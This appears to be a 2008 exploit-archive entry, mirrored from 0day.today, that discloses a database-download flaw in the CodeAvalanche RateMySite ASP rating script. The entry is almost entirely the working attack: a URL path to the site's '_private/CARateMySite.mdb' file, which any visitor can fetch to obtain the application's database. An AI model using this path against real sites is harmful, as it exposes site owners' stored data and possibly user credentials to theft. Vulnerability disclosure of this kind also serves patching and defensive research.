id: 4461
date: 12/15/2008
title: CodeAvalanche RateMySite (CARateMySite.mdb) Database Disclosure
author: Pouya_Server
cves: 

===============================================================
CodeAvalanche RateMySite (CARateMySite.mdb) Database Disclosure
===============================================================


#########################################################
---------------------------------------------------------
Portal Name: CARateMySite
Download : http://www.truecontent.info/codeavalanche/asp-rating-script.php
Author : Pouya_Server 
Vulnerability : (DD)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/_private/CARateMySite.mdb
 
---------------------------------



#  0day.today [2023-03-27]  #